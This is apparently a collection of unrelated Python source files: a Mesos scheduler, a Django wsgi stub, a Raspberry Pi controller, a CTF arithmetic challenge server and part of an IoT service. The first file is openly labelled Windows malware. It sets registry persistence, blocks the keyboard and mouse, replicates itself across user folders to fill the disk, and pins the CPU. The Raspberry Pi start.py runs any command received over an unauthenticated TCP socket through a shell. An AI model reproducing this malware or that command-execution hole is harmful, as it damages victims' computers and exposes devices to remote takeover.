return True # Se creó la carpeta
except:
return False# La carpeta ya existe
try: # Solo si tiene permisos de administrador
registry = OpenKey(HKEY_LOCAL_MACHINE, keyVal, 0, KEY_ALL_ACCESS) # machine
SetValueEx(registry,name, 0, REG_SZ, path)
verificar() # Crea Carpeta
except: # Si no tien permisos de administrador
if (verificar()):
registry = OpenKey(HKEY_CURRENT_USER, keyVal, 0, KEY_ALL_ACCESS) # local
SetValueEx(registry,name, 0, REG_SZ, path)
def Block(): # Lib [KeyandMouse_Block]
mouse = Controller()
def BlockMouse():
mouse.position = (0, 0) # el mouse se va a la posición 0,0 de la pantalla
#mouse.press(Button.right)
#mouse.release(Button.right)
mouse.press(Button.left)
mouse.release(Button.left)
k = pyHook.HookManager()
while(True):
def e(event):
return False
BlockMouse() # Bloquea el mouse
k.KeyAll = e
k.HookKeyboard()
pythoncom.PumpMessages() # Bloquea Teclado
def CreateFileMain(): # Crea carpeta que contiene el virus
try: # Intenta crear la dirección
os.makedirs('C:\\Users\\Public\\EXEBombWindows\\Virus\\NoMeBorres')
return True
except:
return False
pass
def AutoCopy(): # Se replcia en el sistema, (Satura la Unidad:C)
def random_char(y):
return ''.join(random.choice(string.ascii_letters) for x in range(y))
nameKey = "EXE_Bomb_Windows" # Nombre del virus
user = str(getuser())
path = "C:\\Users\\Public\\EXEBombWindows\\Virus\\NoMeBorres\\"+nameKey+".exe" # Segunda iniciada, esto debe existir
can = 64 # Números de caracteres del nombre del virus
documentos = 'C:\\Users\\'+user+'\\Documents'
music = 'C:\\Users\\'+user+'\\Music'
video = 'C:\\Users\\'+user+'\\Videos'
picture = 'C:\\Users\\'+user+'\\Pictures'
download = 'C:\\Users\\'+user+'\\Downloads'
roaming = 'C:\\Users\\'+user+'\\AppData\\Roaming\\VirusBomb'
locallow = 'C:\\Users\\'+user+'\\AppData\\LocalLow\\VirusBomb'
local = 'C:\\Users\\'+user+'\\AppData\\Local\\VirusBomb'
def CreateFolder():
try: # Intenta crear la dirección
os.makedirs(documentos)
except:
pass
try: # Intenta crear la dirección
os.makedirs(music)
except:
pass
try: # Intenta crear la dirección
os.makedirs(video)
except:
pass
try: # Intenta crear la dirección
os.makedirs(picture)
except:
pass
try: # Intenta crear la dirección
os.makedirs(download)
except:
pass
try: # Intenta crear la dirección
os.makedirs(roaming)
except:
pass
try: # Intenta crear la dirección
os.makedirs(locallow)
except:
pass
try: # Intenta crear la dirección
os.makedirs(local)
except:
pass
def CopyDoc():
try:
shutil.copy(path, documentos+"\\"+random_char(can)+".exe")
except:
pass
def CopyMus():
try:
shutil.copy(path, music+"\\"+random_char(can)+".exe")
except:
pass
def CopyVic():
try:
shutil.copy(path, video+"\\"+random_char(can)+".exe")
except:
pass
def CopyPic():
try:
shutil.copy(path, picture+"\\"+random_char(can)+".exe")
except:
pass
def CopyDow():
try:
shutil.copy(path, download +"\\"+random_char(can)+".exe")
except:
pass
def CopyRoa():
try:
shutil.copy(path, roaming+"\\"+random_char(can)+".exe")
except:
pass
def CopyLocL():
try:
shutil.copy(path, locallow +"\\"+random_char(can)+".exe")
except:
pass
def CopyLoc():
try:
shutil.copy(path, local+"\\"+random_char(can)+".exe")
except:
pass
#inicia Hilo
CreateFolder()
while(True):
CopyDoc()
CopyMus()
CopyVic()
CopyPic()
CopyDow()
CopyRoa()
CopyLocL()
CopyLoc()
def CPU():
def sature():
n1 = (random.randrange(98798498456498889)/random.randrange(15))
n2 = (random.randrange(98798498456498889)+random.randrange(64165143651651))
n3 = (random.randrange(98798498456498889)*random.randrange(999))
n4 = (random.randrange(98798498456498889)*random.randrange(453))
n5 = (random.randrange(98798498456498889)-random.randrange(453453453453453453))
n6 = (random.randrange(98798498456498889)*random.randrange(1435))
n7 = (random.randrange(98798498456498889)*random.randrange(4534))
n8 = (random.randrange(98798498456498889)-random.randrange(45345453453453453))
n9 = (random.randrange(98798498456498889)*random.randrange(154345))
n10 = (random.randrange(98798498456498889)*random.randrange(4354345345345))
while(True):
try:
while(True):
sature()
except:
pass
if __name__ == '__main__':
if (CreateFileMain()): # Se ejecuta en el primer inicio
nameKey = "EXE_Bomb_Windows.exe"
filePath = "C:\\Users\\Public\\EXEBombWindows\\Virus\\NoMeBorres\\"+ nameKey
try:
with open(filePath, 'r') as f: # Verifica el virus se encuentra oculto en el sistema
print("El virus existe")
except : #Replica
print("No se encuentra en la carpeta, replicando...")
try:
shutil.copy(nameKey , filePath) # Intenta ocultar el virus en una carpeta
print("Se replicó exitosamente")
except:
print("Replica fallida")
# Autoinicia en registro
addStartup()
print("se creó la carpeta y startup exitoso, virus deshabilitado")
exit()
else: # Solo se ejecuta si la PC ya está infectada
block = threading.Thread(target=Block) # Bloquea Teclado y mouse
#block.start() # Bloquea teclado y mouse
while(True):
autocopy = Process(target=AutoCopy) # Copia y replica el virus en muchas carpetas del usuario
cpuS = Process(target=CPU)
#cpuS.start()
#autocopy.start() # Saturación del disco duro
|
dispatcher.py
|
# scheduler.dispatcher: Scheduler logic for matching resource offers to job requests.
import os
import sys
import math
import time
from threading import Thread, Event
import socket
from collections import deque, OrderedDict
from common import *
from core import *
from mesosutils import *
import db
#from protobuf_to_dict import protobuf_to_dict
import json
import mesos.interface
from mesos.interface import mesos_pb2
import mesos.native
import logging
DEFAULT_MEM = 4 * 1024
OFFER_HOLD = 5
heartBeat = Event()
class Dispatcher(mesos.interface.Scheduler):
def __init__(self, master, webaddr, daemon=True):
self.mesosmaster = master # Mesos Master (e.g. zk://host1:2181,host2:2181/mesos)
self.webaddr = webaddr
self.pending = deque() # Pending jobs. First job is popped once there are enough resources available to launch it.
self.active = {} # Active jobs keyed on jobId.
self.finished = {} # Finished jobs keyed on jobId.
self.offers = {} # Offers from Mesos keyed on offerId. We assume they are valid until they are rescinded by Mesos.
self.jobsCreated = 0 # Total number of jobs created for generating job ids.
self.daemon = daemon # Run as a daemon (or finish when there are no more pending/active jobs)
self.connected = False
self.terminate = False # Flag to signal termination to the owner of the dispatcher
self.frameworkId = None # Will get updated when registering with Master
self.idle = 0
self.gc = time.time()
self.offerRelease = 0
self.currentDir = 1 # 1 or -1. Choose from beginning or end of port range
self.offerHold = {}
logging.info("[DISPATCHER] Initializing with master at %s" % master)
def submit(self, job):
logging.info("[DISPATCHER] Received new Job for Application %s, Job ID= %d" % (job.appName, job.jobId))
self.pending.append(job)
def getActiveJobs(self):
return self.active
def getFinishedJobs(self):
return self.finished
def getJob(self, jobId):
if jobId in self.active:
return self.active[jobId]
if jobId in self.finished:
return self.finished[jobId]
return None
def fullId(self, jobId, taskId):
return "%d.%d" % (jobId, taskId)
def jobId(self, fullid):
s = fullid.split(".")
return int(s[0])
def taskId(self, fullid):
s = fullid.split(".")
return int(s[1].strip())
def getTask(self, fullid):
jobId = self.jobId(fullid)
tid = self.taskId(fullid)
job = self.active[jobId]
for t in job.tasks:
if t.taskid == tid:
return t
return None
def tryTerminate(self):
if not self.daemon and len(self.pending) == 0 and len(self.active) == 0:
self.terminate = True
logging.info("[DISPATCHER] Terminating")
def allocateResources(self, nextJob): #, driver):
committedResources = {}
availableCPU = {i: float(getResource(o.resources, "cpus")) for i, o in self.offers.items()}
availableMEM = {i: getResource(o.resources, "mem") for i, o in self.offers.items()}
availablePorts = {i: PortList(getResource(o.resources, "ports"), dir=self.currentDir) for i, o in self.offers.items()}
committed = {i: False for i in self.offers}
# Try to satisfy each role, sequentially
for roleId in nextJob.roles.keys():
unassignedPeers = nextJob.roles[roleId].peers
committedResources[roleId] = {}
logging.debug("Trying to fill role, %s", roleId)
for offerId, offer in self.offers.items():
if committed[offerId]:
logging.debug(" Offer from %s, but it is already committed", offer.hostname)
continue
if availableMEM[offerId] == None or availableMEM[offerId] == 0:
logging.debug(" Offer from %s has NO MEM", offer.hostname)
continue
if availableCPU[offerId] == 0:
logging.debug(" Offer from %s has NO CPU", offer.hostname)
continue
# Check Hostmask requirement
hostmask = nextJob.roles[roleId].hostmask
host = self.offers[offerId].hostname.encode('utf8','ignore')
r = re.compile(hostmask)
if not r.match(host):
logging.debug(" Offer from %s does not match hostmask %s. DECLINING offer" % (host, hostmask))
continue
logging.debug("Offer %s MATCHES hostmask %s. Checking offer against role requirements" % (host, hostmask))
# Allocate CPU Resource
cpuPerPeer = nextJob.roles[roleId].params.get('cpu', 1)
requestedCPU = min(unassignedPeers * cpuPerPeer, availableCPU[offerId])
requestedPeers = int(math.floor(requestedCPU / cpuPerPeer))
if 'peers_per_host' in nextJob.roles[roleId].params:
explicitPeerRequest = nextJob.roles[roleId].params['peers_per_host']
explicitCPURequest = explicitPeerRequest * cpuPerPeer
if explicitCPURequest > availableCPU[offerId]:
# Cannot satisfy specific peers-to-host requirement
continue
else:
requestedCPU = explicitCPURequest
requestedPeers = explicitPeerRequest
# Allocate Memory Resource
requestedMEM = availableMEM[offerId]
if 'mem' in nextJob.roles[roleId].params:
memPolicy = nextJob.roles[roleId].params['mem']
if memPolicy == 'some':
requestedMEM = min(DEFAULT_MEM, availableMEM[offerId]/4)
elif memPolicy == 'all':
pass
elif str(memPolicy).isdigit():
requestedMEM = memPolicy * 1024
if requestedMEM > availableMEM[offerId]:
# Cannot satisfy user's memory request
continue
# Commit Resources for this offer with this role
committedResources[roleId][offerId] = {}
# NO LONGER Assumes a 1:1 Peer:CPU ratio or ALL MEM
committedResources[roleId][offerId]['cpus'] = requestedCPU
committedResources[roleId][offerId]['peers'] = requestedPeers #requestedCPU / assignedPeersInRole
unassignedPeers -= requestedPeers #assignedPeersInRole #requestedCPU
availableCPU[offerId] -= requestedCPU
committedResources[roleId][offerId]['mem'] = requestedMEM
availableMEM[offerId] -= requestedMEM
committedResources[roleId][offerId]['ports'] = availablePorts[offerId]
# Check if this offer is fully committed or not
if availableCPU[offerId] == 0 or availableMEM[offerId] == 0:
committed[offerId] = True
logging.debug(" Remaining resources on %s: CPU=%d MEM=%d", host, availableCPU[offerId], availableMEM[offerId])
logging.debug(" UNASSIGNED PEERS for Role `%s` = %d", roleId, unassignedPeers)
if unassignedPeers <= 0:
# All peers for this role have been assigned
break
if unassignedPeers > 0:
# Could not commit all peers for this role with current set of offers
logging.warning("Failed to satisfy role %s. Left with %d unassigned Peers" % (roleId, unassignedPeers))
return None
return committedResources
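# Illustrative shape of a successful reservation returned above (values are made up):
#
#   {'role0': {'<offer-id>': {'cpus': 8, 'peers': 8, 'mem': 4096, 'ports': <PortList>}}}
#
# i.e. a mapping of roleId -> offerId -> the resources committed from that offer.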
# See if the next job in the pending queue can be launched using the current offers.
# Upon failure, return None. Otherwise, return the Job object with fresh k3 tasks attached to it
def prepareNextJob(self):
logging.info("[DISPATCHER] Attempting to prepare the next pending job. Currently have %d offers" % len (self.offers))
if len(self.pending) == 0:
logging.info("[DISPATCHER] No pending jobs to prepare")
return None
index = 0
nextJob = self.pending[0]
reservation = self.allocateResources(nextJob)
# If no resources were allocated and jobs are waiting, try to launch each in succession
while nextJob and reservation == None:
index += 1
if index >= len(self.pending):
logging.info ("[DISPATCHER] No jobs in the queue can run with current offers")
return None
nextJob = self.pending[index]
reservation = self.allocateResources(nextJob)
# Iterate through the reservations for each role / offer: create peers & tasks
allPeers = []
for roleId, role in reservation.items():
logging.debug("[DISPATCHER] Preparing role, %s" % roleId)
defaultVars = nextJob.roles[roleId].variables
peerVars = nextJob.roles[roleId].getPeerVarIter()
# Sort offers for this role by hostname, to ensure deterministic allocation of resources:
offersheet = OrderedDict(sorted(role.items(), key=lambda r: self.offers[r[0]].hostname))
for offerId, offer in offersheet.items():
peers = []
host = self.offers[offerId].hostname.encode('utf8','ignore')
ip = socket.gethostbyname(host)
if len(allPeers) == 0:
nextJob.master = host
for n in range(offer['peers']):
nextPort = offer['ports'].getNext()
# CHECK: Switched to hostnames
try:
vars = peerVars.next()
except StopIteration:
vars = defaultVars
p = Peer(len(allPeers), vars, ip, nextPort)
peers.append(p)
allPeers.append(p)
taskid = len(nextJob.tasks)
t = Task(taskid, offerId, host, offer['mem'], peers, roleId)
nextJob.tasks.append(t)
logging.debug("PEER LIST:")
for p in peers:
logging.debug(" %-2s %s:%s" % (p.index, p.ip, p.port))
# Identify the master for collecting stdout. TODO: Should we auto-default to offer 0 for stdout?
populateAutoVars(allPeers)
nextJob.all_peers = allPeers
del self.pending[index] #.popleft()
return nextJob
def launchJob(self, nextJob, driver):
#jobId = self.genJobId()
#logging.info("[DISPATCHER] Waiting for resources to settle...")
#time.sleep(60)
logging.info("[DISPATCHER] Launching job %d" % nextJob.jobId)
self.active[nextJob.jobId] = nextJob
self.jobsCreated += 1
self.currentDir *= -1
nextJob.status = "RUNNING"
nextJob.start_ts = time.time()
db.updateJob(nextJob.jobId, status=nextJob.status)
# Group tasks by offer
offerTasks = {}
for taskNum, k3task in enumerate(nextJob.tasks):
if k3task.offerid not in offerTasks:
offerTasks[k3task.offerid] = []
task = taskInfo(nextJob, taskNum, self.webaddr, self.offers[k3task.offerid].slave_id)
offerTasks[k3task.offerid].append(task)
# Build Mesos TaskInfo Protobufs for each k3 task and launch them through the driver
# for taskNum, k3task in enumerate(nextJob.tasks):
# logging.debug (" OFFER ID ========> " + k3task.offerid)
# task = taskInfo(nextJob, taskNum, self.webaddr, self.offers[k3task.offerid].slave_id)
for offerid, tasklist in offerTasks.items():
oid = mesos_pb2.OfferID()
oid.value = offerid
driver.launchTasks(oid, tasklist)
# Stop considering the offer, since we just used it.
del self.offers[offerid]
# Decline all remaining offers, since the job has just been launched.
logging.info("[DISPATCHER] DECLINING remaining offers (Task Launched)")
for oid, offer in self.offers.items():
driver.declineOffer(offer.id)
self.offers.clear()
def cancelJob(self, jobId, driver):
logging.warning("[DISPATCHER] Asked to cancel job %d. Killing all tasks" % jobId)
job = self.active[jobId]
job.status = "FAILED"
db.updateJob(jobId, status=job.status, done=True)
for t in job.tasks:
t.status = "TASK_FAILED"
fullid = self.fullId(jobId, t.taskid)
tid = mesos_pb2.TaskID()
tid.value = fullid
logging.warning("[DISPATCHER] Killing task: " + fullid)
driver.killTask(tid)
del self.active[jobId]
self.finished[jobId] = job
# self.tryTerminate()
def getSandboxURL(self, jobId=None):
# For now, return Mesos URL to Framework:
master = resolve(self.mesosmaster).strip()
url = master + '/#/frameworks/' + self.frameworkId.value
return url
def taskFinished(self, fullid):
jobId = self.jobId(fullid)
job = self.active[jobId]
runningTasks = False
for t in job.tasks:
if t.taskid == self.taskId(fullid):
t.status = "TASK_FINISHED"
if t.status != "TASK_FINISHED":
runningTasks = True
# If all tasks are finished, clean up the job
if not runningTasks:
logging.info("[DISPATCHER] All tasks finished for job %d" % jobId)
# TODO Move the job to a finished job list
job = self.active[jobId]
job.status = "FINISHED"
db.updateJob(jobId, status=job.status, done=True)
del self.active[jobId]
self.finished[jobId] = job
self.tryTerminate()
# --- Mesos Callbacks ---
def registered(self, driver, frameworkId, masterInfo):
logging.info ("[DISPATCHER] Registered with framework ID %s" % frameworkId.value)
self.connected = True
self.frameworkId = frameworkId
self.driver = driver
def statusUpdate(self, driver, update):
s = update.task_id.value.encode('utf8','ignore')
jobId = self.jobId(update.task_id.value)
if jobId not in self.active:
logging.warning("[DISPATCHER] Received a status update for an old job: %d" % jobId)
return
k3task = self.getTask(s)
host = k3task.host
state = mesos_pb2.TaskState.Name(update.state)
logging.info ("[TASK UPDATE] TaskID %s on host %s. Status: %s [%s]"% (update.task_id.value, host, state, update.data))
# TODO: Check STDOUT flag, capture stream in update.data, & append to appropriate file
# will need to update executor and ensure final output archive doesn't overwrite
# if update.state == mesos_pb2.TASK_RUNNING and self.active[jobId].stdout:
# stdout =
# if not os.path.exists(????):
# os.mkdir(???)
# with open(os.path.join(self.job.path, 'output'), 'a') as out:
# out.write(update.data)
if update.state == mesos_pb2.TASK_KILLED or \
update.state == mesos_pb2.TASK_FAILED or \
update.state == mesos_pb2.TASK_LOST:
jobId = self.jobId(update.task_id.value)
self.cancelJob(jobId, driver)
if update.state == mesos_pb2.TASK_FINISHED:
self.taskFinished(update.task_id.value)
def killStragglers(self, curr_ts, driver):
expired_jobs = []
for (job_id, job) in self.active.items():
if job.time_limit != 0 and (curr_ts - job.start_ts) >= job.time_limit:
logging.info("[DISPATCHER] Cancelling Job %s. Time limit of %d seconds exceeded" % (job_id, job.time_limit))
expired_jobs.append(job_id)
for job_id in expired_jobs:
self.cancelJob(job_id, driver)
def frameworkMessage(self, driver, executorId, slaveId, message):
logging.info("[FRMWK MSG] %s" % message[:-1])
# Handle resource offers from Mesos.
# If there is a pending job, add all offers to self.offers,
# then see if pending jobs can be launched with the offers accumulated so far.
def resourceOffers(self, driver, offers):
heartBeat.set()
# logging.info("[DISPATCHER] Got %d resource offers. %d jobs in the queue" % (len(offers), len(self.pending)))
ts = time.time()
self.killStragglers(ts, driver)
# Heart Beat logging
# if ts > self.idle:
logging.info("[DISPATCHER] HeartBeatting with Mesos. # Offers: %d", len(offers))
# self.idle = ts + heartbeat_delay
# Crude Garbage Collection to police up jobs in bad state
if ts > self.gc:
pendingJobs = [j.jobId for j in self.pending]
for job in db.getJobs():
if job['jobId'] in pendingJobs or job['jobId'] in self.active or JobStatus.done(job['status']):
continue
else:
logging.info("[GARBAGE COLLECTION] Job `%(jobId)s` is listed as %(status)s, \
but is neither pending nor active. Killing it now." % job)
db.updateJob(job['jobId'], status=JobStatus.KILLED, done=True)
self.gc = ts + gc_delay
if len(self.pending) == 0:
self.offerRelease = ts + offer_wait
for offer in offers:
driver.declineOffer(offer.id)
# logging.debug("DECLINING Offer from %s" % offer.hostname)
return
for offer in offers:
self.offers[offer.id.value] = offer
logging.debug ("OFFER ID =====>>> " + offer.id.value)
nextJob = self.prepareNextJob()
if nextJob != None:
self.launchJob(nextJob, driver)
else:
if len(self.pending) > 0:
logging.info("[DISPATCHER] Not enough resources to launch next job")
if ts > self.offerRelease + offer_wait:
logging.info("[DISPATCHER] I've waited %s seconds and cannot lauch. Releasing all offers", offer_wait)
for offer in offers:
driver.declineOffer(offer.id)
del self.offers[offer.id.value]
self.offerRelease = ts + offer_wait
else:
def clearOffers():
logging.debug("[DISPATCHER] I'm waiting for a heartbeat in case there are no offers.")
heartbeat = heartBeat.wait(float(offer_wait))
if not heartbeat:
logging.info("[DISPATCHER] Heartbeat Timeout holding offers (NO OFFERS). I've waited %s seconds and cannot lauch. Releasing all offers", offer_wait)
for offer in offers:
driver.declineOffer(offer.id)
del self.offers[offer.id.value]
self.offerRelease = ts + offer_wait
else:
logging.debug("[DISPATCHER] Heartbeat was alive. No need to clear offers.")
heartBeat.clear()
logging.info("[DISPATCHER] Insufficient Offers, I will wait a bit for more offers")
nulloffer = Thread(target=clearOffers)
nulloffer.start()
logging.info("[DISPATCHER] HOLDING %d Offers for %s Jobs and waiting for more offers", len(self.offers), len(self.pending))
def offerRescinded(self, driver, offer):
logging.warning("[DISPATCHER] Previous offer '%s' invalidated", str(offer.value))
if offer.value in self.offers:
del self.offers[offer.value]
def kill(self, driver):
# self.pending is a deque of Job objects (not a dict), so cancel the active jobs and drop the pending queue.
for jobId in list(self.active.keys()):
logging.warning("[DISPATCHER] KILLING job, %s" % jobId)
self.cancelJob(jobId, driver)
self.pending.clear()
self.terminate = True
logging.info("[DISPATCHER] Terminating")
|
wsgi.py
|
"""
WSGI config for ControlServer project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
# import asyncio
# import threading
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ControlServer.settings')
application = get_wsgi_application()
# thread_loop = asyncio.new_event_loop()
#
#
# def start_loop(loop):
# asyncio.set_event_loop(loop)
# loop.run_forever()
#
#
# t = threading.Thread(target=start_loop, args=(thread_loop,), daemon=True)
# t.start()
|
start.py
|
#! /usr/bin/env python
import subprocess
from nodes import Console
import threading
import time
import socket
# Copilot.
copilot = Console("192.168.1.11", 11000)
# Connection verification thread method.
def piconn():
try:
while True:
copilot.send("status,Raspberry connected")
time.sleep(5)
except:
raise
return
# Declare the thread.
#rpiConn = threading.Thread(target=piconn)
# Start the thread.
#rpiConn.start()
lcam = subprocess.Popen('mjpg_streamer -b -i "/usr/local/lib/input_uvc.so -f 25 -d /dev/video0 -r 1280*720" -o "/usr/local/lib/output_http.so -w /usr/local/www -p 8080"', shell=True)
rcam = subprocess.Popen('mjpg_streamer -b -i "/usr/local/lib/input_uvc.so -f 25 -d /dev/video1 -r 1280*720" -o "/usr/local/lib/output_http.so -w /usr/local/www -p 8081"', shell=True)
#time.sleep(5)
rard = subprocess.Popen(['sudo', 'python', '/home/pi/main.py', '0', '&'], shell=False)
#time.sleep(5)
lard = subprocess.Popen(['sudo', 'python', '/home/pi/main.py', '1', '&'], shell=False)
#time.sleep(5)
serv = subprocess.Popen(['sudo', 'python', '/home/pi/servo.py', '&'], shell=False)
# Request dictionary that maps each received symbol to the corresponding shell command.
req = {
"mS" : "sudo python /home/pi/main.py &",
"mT" : "sudo pkill -f main.py",
"mR" : "sudo kill " + str(rard.pid) + " & sudo python /home/pi/control_files/main.py &",
"m2S" : "sudo python /home/pi/main2.py",
"m2T" : "sudo pkill -f main2.py",
"m2R" : "sudo kill " + str(lard.pid) + " & sudo python /home/pi/main2.py & ",
"sS" : "sudo python /home/pi/servo2.py",
"sT" : "sudo pkill -f servo2.py",
"sR" : "sudo kill " + str(serv.pid) + " & sudo python /home/pi/servo2.py & ",
"rcS" : 'sudo mjpg_streamer -b -i "/usr/local/lib/input_uvc.so -f 25 -d /dev/video0 -r 1280*720" -o "/usr/local/lib/output_http.so -w /usr/local/www -p 8080"',
"rcT" : 'sudo kill ' + str(rcam.pid),
"rcR" : 'sudo kill ' + str(rcam.pid) + ' & sudo mjpg_streamer -b -i "/usr/local/lib/input_uvc.so -f 25 -d /dev/video0 -r 1280*720" -o "/usr/local/lib/output_http.so -w /usr/local/www -p 8080" &',
"lcS" : 'sudo mjpg_streamer -b -i "/usr/local/lib/input_uvc.so -f 25 -d /dev/video1 -r 1280*720" -o "/usr/local/lib/output_http.so -w /usr/local/www -p 8081"',
"lcT" : 'sudo kill ' + str(lcam.pid),
"lcR" : 'sudo kill ' + str(lcam.pid) + ' & sudo mjpg_streamer -b -i "/usr/local/lib/input_uvc.so -f 25 -d /dev/video1 -r 1280*720" -o "/usr/local/lib/output_http.so -w /usr/local/www -p 8081" &',
"KAP" : "sudo killall python",
"KAC" : "sudo killall mjpg_streamer",
"SA" : "sudo /home/pi/./start.py",
"SD" : "sudo halt",
"KA" : "sudo killall python & sudo killall mjpg_streamer"
}
host = '192.168.1.6'
port = 8001
srv = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
conn =socket.socket()
srv.bind((host,port))
try:
while True:
print "Listenning .."
try:
srv.listen(1)
except Exception as e:
print "Error listening (Line) :", e.message
try:
conn , addr = srv.accept() #connection - blocking call
except Exception as e:
print "Error accepting TCP connection (Line ) :", e.message
try:
msg = conn.recv(1024) # Normally 1024, 20 fast response
except Exception as e:
print "Error receiving TCP package (Line ) :", e.message
msg = msg.strip("\n")
msglen = len(msg)
if(msglen<=3):
ret = subprocess.Popen(req[msg].split(),shell=False)
print req[msg].split()
if msg == "mS": rard = ret.pid
elif msg == "m2S": lard = ret.pid
elif msg == "sS": serv = ret.pid
# print req[msg]
else:
ret = subprocess.Popen(msg,shell=True)
# print msg
conn.close()
except KeyboardInterrupt as e:
print "Keyboard Interrupt at Start.py"
except Exception as e:
print "Problem in start.py :", e.message
|
serve.py
|
import multiprocessing
import socket
from datetime import datetime  # used for the error timestamp in handle()
from typing import Tuple
import flags_and_teams
import random
def get_task() -> Tuple[str, str]:
n1 = random.randint(-10, 10)
n2 = random.randint(-10, 10)
p = random.choice(["+", "-", "*"])
s = f"{n1} {p} {n2}"
return (s, str(int(eval(s))))
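# Example of what get_task() can return (actual values depend on the RNG):
#   ("7 * -3", "-21")   # first element is shown to the player, second is the expected answer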
import logging
def init_logger(logger):
logger.setLevel(logging.DEBUG)
log_formatter = logging.Formatter("[%(asctime)s] [%(name)8s:%(process)-6.6s] [%(levelname)-5.5s] --- %(message)s")
file_handler = logging.FileHandler("./latest.log")
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(log_formatter)
logger.addHandler(file_handler)
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.INFO)
console_handler.setFormatter(log_formatter)
logger.addHandler(console_handler)
def handle(connection: socket.socket, address):
try:
logger = logging.getLogger("handler")
init_logger(logger)
logger.info("Connected at %r", address)
flag = "Something unexpected happened. If you see this message, please contact us"
connection.sendall("Hello stranger, i don't identify you. Maybe you introduce yourself? ".encode())
while True:
data = connection.recv(1024)
if data == "":
logger.debug("Socket closed remotely")
break
team = data.decode('UTF-8') #type: str
team = team.strip()
flag = flags_and_teams.data.get(team, None)
if flag:
break
else:
connection.sendall("I still can't identify you. mb try again? ".encode())
connection.sendall("Ok. Here is you task:\n".encode())
for i in range(100):
eq = get_task()
logger.debug("Made problem: %s", eq)
connection.sendall("What is ".encode())
connection.sendall(eq[0].encode())
connection.sendall("\n".encode())
data = None
try:
connection.settimeout(1)
data = connection.recv(1024)
connection.settimeout(10)
except:
pass
logger.debug("Received data %r", data)
if not data:
logger.debug("Timeout".encode())
logger.info(f"{team}{address} timeout")
connection.sendall("Time is up!\n".encode())
connection.shutdown(socket.SHUT_RDWR)
break
if eq[1] == data.decode().strip():
connection.sendall("Correct\n".encode())
logger.debug("Correct")
else:
logger.debug("Incorrect")
logger.info(f"{team}{address} incorrect")
connection.sendall("Incorrect\n".encode())
connection.shutdown(socket.SHUT_RDWR)
break
else:
logger.warning(f"Team {team}{address} solved!")
connection.sendall("Congratulations! Your flag is {0} \n".format(flag).encode())
except:
logger.exception("Problem handling request")
connection.sendall(("Something wrong happent. If you see this, please contact admins with this timestamp: " + \
datetime.now().strftime("%D %X:%f")).encode())
finally:
logger.debug("Closing socket")
connection.shutdown(socket.SHUT_RDWR)
connection.close()
class Server(object):
def __init__(self, hostname, port):
self.logger = logging.getLogger("server")
init_logger(self.logger)
self.hostname = hostname
self.port = port
def start(self):
self.logger.debug("listening")
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind((self.hostname, self.port))
self.socket.listen(1)
while True:
conn, address = self.socket.accept()
self.logger.debug("Got connection")
process = multiprocessing.Process(target=handle, args=(conn, address))
process.daemon = True
process.start()
self.logger.debug("Started process %r", process)
if __name__ == "__main__":
logger = logging.getLogger("main")
init_logger(logger)
import sys
port = int(sys.argv[1])
server = Server("0.0.0.0", port)
try:
logger.info("Listening")
server.start()
except:
logger.exception("Unexpected exception")
finally:
logger.info("Shutting down")
for process in multiprocessing.active_children():
logger.info("Shutting down process %r", process)
process.terminate()
process.join()
logger.info("All done")
|
RHUBModbus.py
|
#!/usr/bin/env python
#
# Example RenewablesHUB Modbus service receiver.
#
# Pre-requisites:
#
# # apt install python-is-python3 python3-pip python3-virtualenv
# # pip3 install aiohttp==3.7.4.post0 pytz requests Sphinx sphinx_rtd_theme
# # mkdir -m 775 /var/log/rhubmodbus
import os, sys, signal, threading, queue, socket, requests, json, pytz, configparser
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from client.onem2m.OneM2MPrimitive import OneM2MPrimitive
from client.onem2m.http.OneM2MRequest import OneM2MRequest
from client.onem2m.resource.Container import Container
from client.onem2m.resource.ContentInstance import ContentInstance
from client.cse.CSE import CSE
from client.ae.AE import AE
from client.ae.AsyncResponseListener import AsyncResponseListenerFactory
from client.Utility import Utility
from threading import Lock
from datetime import datetime
from typing import Final
from aiohttp import web
################# Configure the following for your environment #################
# The AE App and credential IDs, as generated in PolicyNet via More -> System settings -> AE Registration Credentials.
APP_ID: Final = 'Nrhubmodbus'
AE_ID: Final = 'XXXXXXXXXXXXXXXX'
# Address of the IN-CSE running in your cloud environment.
CSE_PROTOCOL: Final = 'http'
CSE_HOST: Final = 'dev9.usw1.aws.corp.grid-net.com'
CSE_PORT: Final = 21300
# Identification of this IN-AE.
RESOURCE_NAME: Final = APP_ID[1:]
APP_NAME: Final = 'com.grid-net.' + RESOURCE_NAME
# Timezone for log rotation. A new log file is started at midnight in this timezone.
tz = pytz.timezone('Australia/Sydney')
############################## End of site config ##############################
# MN-AE configuration container and content instance: in this example, the report interval, in seconds.
SEND_CONFIG: Final = False
CONFIG_CONTAINER: Final = 'rhubModbus'
CONFIG_RESOURCE_NAME: Final = 'reportInterval'
CONFIG_CONTENT: Final = 3600
# Details of the (usually local) listener that the IN-CSE will send notifications to.
NOTIFICATION_PROTOCOL: Final = 'http'
NOTIFICATION_HOST: Final = Utility.myIpAddress()
NOTIFICATION_PORT: Final = 8081
NOTIFICATION_CONTAINER: Final = 'cnt-00001'
NOTIFICATION_SUBSCRIPTION: Final = 'sub-00001'
NOTIFICATION_CONTAINER_MAX_AGE: Final = 900
NOTIFICATION_LOG_DIR: Final = '/var/log/rhubmodbus'
NOTIFICATION_LOG_PREFIX: Final = 'notification_log_'
NOTIFICATION_LOG_SUFFIX: Final = '.json'
SETTINGS_FILE: Final = '/var/tmp/rhubmodbus.ini'
# Create an instance of the CSE to send requests to.
pn_cse = CSE(CSE_HOST, CSE_PORT)
# Persistent settings via INI file.
settings = configparser.ConfigParser()
# Queue used to control the configWorker thread.
configQueue = queue.Queue()
# Mutex to enforce atomicity on log file writes.
logMutex = Lock()
# Thread to asynchronously send configuration commands to MN-AEs that report in.
def configWorker():
while True:
config_path = configQueue.get()
print('Creating configuration content instance {}'.format(config_path))
content = ContentInstance({'rn': CONFIG_RESOURCE_NAME, 'con': CONFIG_CONTENT})
assert pn_cse.ae is not None
